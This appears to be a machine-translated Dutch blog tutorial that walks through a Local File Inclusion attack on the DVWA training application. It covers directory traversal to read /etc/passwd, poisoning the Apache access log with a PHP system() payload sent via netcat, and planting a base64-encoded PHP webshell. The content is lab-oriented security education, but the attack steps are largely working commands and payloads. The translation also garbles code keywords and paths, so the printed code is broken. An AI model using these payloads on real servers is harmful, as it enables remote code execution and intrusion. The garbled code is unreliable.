Verdomd Kwetsbare Web App - Local File Inclusion (LFI)
Auteur:
Ashfaq Ansari

Beoordeeld door:
Rating:
5
Op Maart 18, 2013
Laatst gewijzigd:Maart 18, 2013

Overzicht:

Lokale File Inclusion (LFI) is een vorm van kwetsbaarheid meestal te vinden op websites. Het stelt een aanvaller in een lokaal bestand zijn, meestal door middel van een script op de webserver. De kwetsbaarheid optreedt als gevolg van het gebruik van door de gebruiker geleverde inbreng zonder de juiste validatie.

Introductie

 

In het eerste deel van Verdomd Kwetsbare Web App (DVWA) serie, We hebben gezien hoe we kunnen installeren Verdomd Kwetsbare Web Application (DVWA) op BackTrack 5 R1.
 

Als je het eerste deel niet hebben gelezen, hier is de link: http://hacksys.vfreaks.com / pen-testing / verdomde-kwetsbaar-web-app-sql-injection.html

 

Nu, zullen we een andere aanvalsmethode bekend als testen Lokale File Inclusion (LFI).
 

Lokale File Inclusion (LFI) is een vorm van kwetsbaarheid meestal te vinden op websites. Het stelt een aanvaller in een lokaal bestand zijn, meestal door middel van een script op de webserver.
 

De kwetsbaarheid optreedt als gevolg van het gebruik van door de gebruiker geleverde inbreng zonder de juiste validatie. Dit kan leiden tot iets zo klein afgeven van de inhoud van het bestand, maar afhankelijk van de ernst, naar een paar kan het leiden tot:
 


1. Code kan worden uitgevoerd op de webserver.
2. Het uitvoeren van code op de client-side zoals JavaScript, die kan leiden tot andere aanvallen, zoals Cross Site Scripting (XSS).
3. Denial of Service (DoS).
4. Diefstal van gegevens en Data Manipulation.

 

Nu, het idee achter Lokale File Inclusion (LFI) aanvalsmethode is dat, Het kan een aanvaller lokale bestanden op de webserver met de kwetsbare web script toe te voegen als de webserver heeft de toestemming om toegang te krijgen.
 

U allen moet denken “Wat is een groot deel in het?”.
 

Goed, Ik moet zeggen dat dit een zeer ernstig probleem Als de webserver is niet juist geconfigureerd.
 

Laten we, van mening dat een aanvaller in staat is om een ​​lokaal bestand op de webserver zijn via kwetsbare PHP-script. Het betekent dat hij in staat om alle PHP-code die is er in het bestand dat wordt opgenomen uit te voeren zal zijn.
 

Nu, sommige moet je denken “Wat het gebruik van het uitvoeren PHP script door het opnemen van een lokaal bestand wanneer het geen hacker makkelijker toegang krijgen?”.
 

De Apache HTTP Server biedt een verscheidenheid van verschillende mechanismen voor het loggen van alles wat er gebeurt op de webserver, van het oorspronkelijke verzoek, via de URL mapping proces, aan de uiteindelijke resolutie van de verbinding, inbegrip van eventuele fouten die zijn opgetreden in het proces.
 

Hier is een fragment van de beveiligingswaarschuwing vinden op Documentatie pagina Apache HTTP Server.
 

Link: http://httpd.apache.org/docs/2.4/logs.html
 

Beveiligingswaarschuwing: Iedereen die naar de directory waar Apache httpd is het schrijven van een logbestand kan schrijven kan vrijwel zeker toegang tot de uid krijgen dat de server wordt gestart als, die normaal wortel. NIET geven mensen toegang tot de map schrijven de logs worden opgeslagen in zonder zich bewust van de gevolgen. zie de beveiligingstips document voor details. Bovendien, logbestanden kunnen rechtstreeks door de klant verstrekte informatie bevatten, zonder ontsnappen. Daarom, is het mogelijk voor kwaadwillende klanten om controle-tekens in te voegen in de logbestanden, dus zorg moet worden genomen bij de behandeling van ruwe logs.

 

Voor uw informatie, in BackTrack 5 R1, de Apache HTTP server's log bestand bevindt zich op:
 

/var / log / apache2 / access.log

/var/log/apache2/error.log


 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Pad logbestand
 

Je hebt al het bovenstaande beveiligingswaarschuwing over de log directory permissies gelezen. Als de aanvaller succesvol in het vinden van het logbestand pad gebruik is Directory traversal aanval, hij deze log kan vergiftigen door het schrijven van kwaadaardige code in de logbestanden, indien de “logboek” map en het bestand machtigingen niet juist geconfigureerd.
 

We zullen zien hoe we kunnen gif de log bestanden in het laatste deel van deze post.
 

Gewapend met basisinformatie over Lokale File Inclusion (LFI), laten we gaan en ervaar het in praktische sessie.
 

Nota: In BackTrack 5 R1, de “access.log” Access Permission bestand voor “Anderen” is ingesteld op “Verboden”.

 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Logbestand Toestemming
 

Nu, laten we “Kunnen lezen” Toegang Toestemming om “Anderen”.
 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Lees Logbestand Toestemming
 

Wij zijn het opzetten “Kunnen lezen” toestemming zodat we kunnen aantonen Lokale File Inclusion (LFI) aanvalsmethode gebruik Verdomd Kwetsbare Web Application (DVWA).
 

Get Set And Go.

 

Laten we eerst in om Verdomd Kwetsbare Web Application (DVWA) en stel de Veiligheid niveau om laag.
 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Beveiliging op Laag
 

Klik op File Inclusion.
 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) File Inclusion Tab
 

http://192.168.96.128/dvwa / Beveiligingsproblemen / op /?page = include.php

 

Door een bestand bewerken ?page = index.php in de URL te bepalen welk bestand opgenomen.
 

Laten we bevestigen of de bovenstaande URL is echt kwetsbaar voor Lokale File Inclusion.
 

We zullen doen Directorytoegang en probeer te bevatten /etc / passwd bestand. Als deze opname is succesvol, wij zullen de inhoud van de te /etc / passwd weergegeven op de webpagina.
 

http://192.168.96.128/dvwa / Beveiligingsproblemen / op /?page = .. / .. / .. / .. / .. / etc / passwd

 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) /etc/passwd Inclusion
 

Dat ziet er goed uit! We konden bevatten /etc / passwd bestand in de Verdomd Kwetsbare Web Application (DVWA) succes als de webpagina is de volledige inhoud van de getoonde /etc / passwd bestand.
 

Onze volgende taak is om te proberen op te nemen Apache logbestand. Opnieuw, we zullen gebruiken Directorytoegang en probeer te bevatten /var / log / apache2 / access.log bestand.
 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Access Log Inclusion
 

http://192.168.96.128/dvwa / Beveiligingsproblemen / op /?page = .. / .. / .. / .. / log / apache2 / access.log

 

Wow! Dit is een goede dag voor ons. Dingen uit te werken op een goede manier. Apache Web Server access.log bestand is met succes opgenomen. Het is een grote aanwijzing dat nu, we kunnen het hoofd richting en probeer Gif de Apache error log.
 

Nota: Zoals ik gebruik deze BackTrack 5 R1 aangezien een jaar. Ik zal duidelijk uit de access.log en error.log zodat ik ben in staat om u de vergiftigde gedeelte van de logbestanden eenvoudig.    

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Duidelijke Logs

We zijn klaar om gif de access.log bestand. Dit is een belangrijke stap, omdat dit zal helpen de aanvaller de include access.log indienen en uitvoeren van de vergiftigd PHP code die wordt geschreven access.log bestand in deze stap. De vergiftiging kan worden bevestigd door controle van de inhoud van error.log bestand.
 

Open een Terminal en maak verbinding met de Apache Web Server op poort 80 gebruik netcat.
 

1
2
3
root @ bt:~ # nc 192.168.96.128 80

GET /hazStart<?php systeem(base64_decode($_GET[een]));?>HTTP hazEnd/1.1

 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Gif Logs
 

Nu, laat bevestigen of vergiftiging succesvol was. Hiervoor, openen we zowel access.log en error.log bestand en probeer om het de inzendingen te begrijpen.
 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Gif Logs
 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Gif Logs
 

Koel! Wij hebben de logbestanden vergiftigd. Elk ding heeft gewerkt als verwacht.
 

Nota: We hebben al een mini PHP shell geschreven in access.log log file. Nu onze volgende drijfveer is om een ​​andere mini PHP shell in de root van de web server hosting de Vloek Vulnerable Web Application schrijven (DVWA).

 

Hier is het commando dat een mini PHP shell zal schrijven op de webserver.
 

1
echo "<?php systeem(base64_decode($_GET['P'])); ?>" > ../../webshell.php

 

Als u zich de mini PHP shell script dat we in de geïnjecteerde access.log bestand, de shell script code wordt hieronder gegeven:
 

1
<?php systeem(base64_decode($_GET['A'])); ?>

 

Kunt u de volgende stap die we moeten doen denk na het bekijken van de shell script code?
 

Goed, Nu zullen we het commando te coderen naar het mini PHP shell script te schrijven aan webserver wortel met behulp van base64 encoding algoritme.
 

Hier is een eenvoudig programma om python base64 coderen een string:
 

1
2
3
4
5
#!/usr / bin / python

base64encodedstr = """echo "<?php systeem(base64_decode($_GET['P'])); ?>" > ../../webshell.php"""

afdrukken "\nGecodeerde String: " + base64encodedstr.coderen("base64",'strenge') + "\n"

 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Base64 Encode
 

De base64 gecodeerde tekenreeks Hieronder volgt:
 

1
ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA/PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA=

 

Dit gaat om de laatste stap voordat we worden verwelkomd met een shell. 🙂
 

Wij zullen u naar de URL hieronder om het schrijven mini PHP shell script naar webserver wortel.

http://192.168.96.128/dvwa / Beveiligingsproblemen / op /?page = .. / .. / .. / .. / log / apache2 / access.log?a = ZWNobyAiPD9waHAgc3lzdGVtKGJhc2U2NF9kZWNvZGUoJF9HRVRbJ3AnXSkpOyA / PiIgPiAuLi8uLi93ZWJzaGVsbC5waHA =

 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) PHP Web Shell
 

Eindelijk!! We hebben het met succes gedaan. We hebben geupload mini PHP shell met een Lokale Kwetsbaarheid File Inclusion in Verdomd Kwetsbare Web Application (DVWA).
 

Ik hou van automatisering en dat is de reden waarom ik hou van python. Python geeft je uitstekende vermogen om complexe dingen heel eenvoudig te bereiken.
 

Ik heb een Python-script geschreven dat we schreven voor de exploitatie van automatiseren Lokale File Inclusion (LFI) in Verdomd Kwetsbare Web Application (DVWA).
 

Verdomd Kwetsbare Web Application - Lokale File Inclusion (LFI) Exploit Script
 

Aangezien de lengte van de exploit script is zeer groot, Ik heb alle scripts die in deze post geritst en is beschikbaar voor download.
 

Download Verdomd Kwetsbare Web Application – Lokale File Inclusion (LFI) posten materialen:
 

DVWA - LFI Exploit Scripts
3.9 KIB
644 Downloads
Details ...

 

Dank u voor het nemen van uw tijd om dit bericht te lezen. Ik hoop dat dit helpt u. Aarzel dan niet om terug te vertrekken reacties als je twijfels hebt of als je iets wil bespreken met betrekking tot Lokale File Inclusion (LFI).
 

46,413 totaal aantal vertoningen, 24 aantal vertoningen vandaag

De volgende twee tabbladen te veranderen hieronder inhoud.

Ashfaq Ansari

Beveiliging Onderzoeker
Ashfaq Ansari is de oprichter van HackSys Team codenaam "Panthera". Hij is een security-onderzoeker met ervaring in verschillende aspecten van informatiebeveiliging. Hij is auteur "HackSys Extreme Kwetsbare Driver" en "Shellcode of Death". Hij heeft ook geschreven en publiceerde diverse whitepapers op een laag level software uitbuiting. Zijn belangrijkste interesse ligt in "Low Level Exploitation", "Reverse Engineering", "Programma Analyse" en "Hybride Fuzzing". Hij is een fanboy van Kunstmatige Intelligentie en Machine Learning. Hij is het hoofdstuk voorsprong van null Pune.

Laatste berichten van Ashfaq Ansari (bekijk alle)

2 Reacties op “Verdomd Kwetsbare Web App - Local File Inclusion (LFI)”

  1. Zou het mogelijk zijn om de aanval zonder het gelezen toestemming op het access.log tonen. Met andere woorden, het verlaten van de set toestemming om verboden? Aangezien de meeste servers deze set in de eerste plaats kan hebben. zou zeer gewaardeerd worden.

    • Hi KC,

      Helaas, het logbestand moet hebben toestemming lezen op access.log.

      Tenzij, We kunnen het bestand lezen, we niet in staat om de aanslag te plegen.

      Echter, je mag probeer verschillende aanvalsvectoren.

      Dank.

Laat een reactie achter

Uw e-mailadres wordt niet gepubliceerd. Verplichte velden zijn gemarkeerd *